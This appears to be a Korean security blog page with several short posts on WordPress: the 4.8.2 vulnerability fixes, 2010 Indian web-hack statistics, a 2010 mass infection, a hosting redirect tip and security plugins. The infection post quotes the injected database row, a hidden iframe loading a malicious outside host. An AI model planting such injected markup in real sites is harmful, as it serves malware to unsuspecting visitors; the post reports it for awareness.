오픈 소스 기반의 블로그 서비스인 워드프레스(WordPress)에서 다수의 보안 취약점이 발견되었으며, 이러한 문제 해결을 포함하는 4.8.2 버전이 출시되었다.


WordPress 4.8.2에서 해결한 보안 취약점은 다음과 같다.


  1. $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi). WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability. Reported by Slavco

  2. A cross-site scripting (XSS) vulnerability was discovered in the oEmbed discovery. Reported by xknown of the WordPress Security Team.

  3. A cross-site scripting (XSS) vulnerability was discovered in the visual editor. Reported by Rodolfo Assis (@brutelogic) of Sucuri Security.

  4. A path traversal vulnerability was discovered in the file unzipping code. Reported by Alex Chapman (noxrnet).

  5. A cross-site scripting (XSS) vulnerability was discovered in the plugin editor. Reported by 陈瑞琦 (Chen Ruiqi).

  6. An open redirect was discovered on the user and term edit screens. Reported by Yasin Soliman (ysx).

  7. A path traversal vulnerability was discovered in the customizer. Reported by Weston Ruter of the WordPress Security Team.

  8. A cross-site scripting (XSS) vulnerability was discovered in template names. Reported by Luka (sikic).

  9. A cross-site scripting (XSS) vulnerability was discovered in the link modal. Reported by Anas Roubi (qasuar).



취약점은 대부분 SQL Injection과 Cross-site Script로 OWASP Top 10에서 선두에 위치하는 심각한 문제점이다.


따라서, 하위 버전 사용자들은 빠른 시일내에 최신 버전으로 업데이트하길 권고한다.



출처: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/


reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    아직 국내에서는 연간 얼마나 많은 사이트들이 해킹을 당하는지 정확한 통계 자료가 없습니다. 그러다 보니, 국내 웹사이트 들은 안전하게 관리를 하나 보다 생각할 수도 있겠지만,

    실제로는 너무 많이 해킹을 당해서, 해킹을 당해도 무감각적이기 때문에, 통계 자체가 의미가 없을 정도라고 보는게 맞을 것입니다.

    하여튼, 인도의 CERT(인터넷 침해 대응 센터)에서 2010년도 상반기 보안 침해 사고에 대한 통계자료를 발표해서 간단히 정리해 봅니다.

    2010년도 상반기에 약 4300 개의 웹사이트가 해킹으로 손상되었으며, 2009년도 상반기(2118건)와 비교해 볼때 약 두배 가량 증가했다.

    웹 해킹은 보통 해커가 원래의 웹페이지를 자신만의 페이지로 변경하는 것을 의미하며, 2010년도 1/4분기에 1981 개 웹사이트가, 2/4분기에는 2381개 웹사이트가 해킹되었다.

    또한, PC가 봇에 감염되는 사례또한 증가했는데 2010년도 6월 경에 약 39600 대의 봇에 감염된 컴퓨터가 있다고 한다.

    그리고, 악성 코드가 포함된 컨텐츠가 업로드된 3367개 웹사이트가 발견되었으며, 주로 Joomla!, WordPress, Drupal, PHP, MS-IIS, Apache, SharePoint Server와 같은 제품의 취약점을 이용한 것으로 알려졌다.

    분석 결과 가장 널리 사용된 공격 중의하나가 바로 SQL 인젝션이었으며, 사용자가 웹사이트를 방문할 때에 자동으로 악성 코드를 다운로드하여 설치하여 감염되게 하는 경로로 사용되고 있다.

    출처: http://informationweek.in/Security/10-07-30/Over_4300_Indian_websites_hacked_in_first_half_of_2010.aspx
    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      워드프레스(WP, WordPress)는 외국에서 개발되어 제공되는 설치형 블로그 툴입니다. 설치형이지만, 이미 몇몇 회사에서는 Saas 형식으로 서비스되고 있으며, 국내에서도 한 곳에서 서비스 중에 있습니다.

      최근, 워드 프레스로 구현된 블로그 수백여개에서 데이터베이스가 손상되는 문제점이 발견되었습니다. 공격으로 인한 피해가 최신 버전의 WP에서도 발견된 것으로 알려져 있습니다.

      삽입된 코드는 SQL Injection 공격의 대표적인 유형인 <iframe>이 포함되어 있는 것으로 보아 SQL Injection 취약점을 통해 공격한 것으로 추측됩니다. 그리고, 관리자페이지(~/wp-admin/)에 로그온이 제대로 되지 않는 문제점이 보여집니다.

      (2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),

      공격 당한 사이트 URL: hxxp://networkads.net/grep/

      한편, 아직 공격당한 지점(Entry Point)를 알아 내지 못하고 있으며, 임시로 DB에 주입된 문자열을 제거하는 수밖에는 없다고 합니다.

      출처: http://blog.sucuri.net/2010/04/mass-infection-of-wordpress-blogs-at.html

      PS: 보안 제품(안티바이러스)가 설치되지 않은 경우에는 공격 당한 사이트에 방문하면 큰일납니다. 참고로, 어베스트!에서는 잡아내므로 안심해도 됩니다.

      PS: 해당 문제의 원인은 관리 페이지의 권한 문제였습니다.

      끝.
      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus
        파란닷컴(paran.com)에서는 개인에 한해 무료 웹호스팅을 제공합니다. 제공하는 사양은 다음과 같습니다.


        FTP 클라이언트를 이용하여 파란닷컴 호스팅 계정을 접속하게 되면, /public_html 폴더를 볼 수 있으며, 이 폴더 아래에 개발한 웹소스를 업로드하게 됩니다.

        하지만, 여러 개의 웹사이트 소스를 업로드하고 이중 하나의 소스를 기본적으로 보이게 하려면 다음과 같이 index.html 파일을 작성하여 업로드합니다.

        <?
         header("Location: /wordpress/");
        ?>
        (주: 위의 예에서는 워드프레스를 설치한 폴더로 자동으로 리디렉트하게 됩니다)

        감사합니다.
        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus
          국내에서 이제 천천히 사용자 층이 확산되기 직전의 솔루션이 바로 워드프레스(WordPress,WP)입니다.

          WP가 사랑받는 이유는 바로 다양한 테마(Themes)와 플러그인(Plugin)이 공짜 또는 유상으로 판매되기 때문입니다.

          따라서, 블로그 등으로 광고를 받아 수익을 창출하는 시스템을 위한 애드센스 전용 스킨이 나와 소개해 드립니다.


          출처: http://www.doshdosh.com/16-adsense-optimized-wordpress-themes-to-maximize-your-contextual-ad-earnings/

          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus
            캐나다의 온타리오에 위치한 SSM(http://SiteSecureMonitor.com) 회사는 유명한 블로그 솔루션인 워드프레스(WP, WordPress)에서 악성 프로그램의 감염을 예방할 수 있는 플러그인을 공개했습니다.

            이 플러그인은 워드프레스 공식 플러그인 디렉터리에서 다운로드할 수 있으며, 주요 기능은 다음과 같습니다.

            • 일반적인 보안 검사
            • WP를 최신 버전으로 업그레이드
            • 기한이 만료된 플러그인 검사
            • WP 블로그의 취약점 위험 감소
            • 로그인 페이지의 오류 메시지 제거
            • WP 버전 정보 숨기기(홈페이지, 대시보드)
            • 디렉터리 탐색 예방
            • 윈도우 라이브 라이터 차단
            • 코어 업데이트 정보 제거
            • 플로그인 업데이트 정보 제거
            • 테마 업데이트 정보 제거
            • WP의 보안 향상
            • 플러그인 디렉터리를 위한 index.php 파일 추가
            • 플러그인 폴더 숨기기
            • 관리자의 ID(admin) 변경
            • wp-config.php, wp-includes 폴더, wp-content 폴더 접근 권한 제한
            • wp-admin 폴더에 접근할 수 있는 IP 제한
            • SSM으로부터 무료 악성 프로그램 검사 제공

            자세한 사항은 아래 링크를 참고하십시오.

            플러그인: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/

             



            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus


              Web Analytics Blogs Directory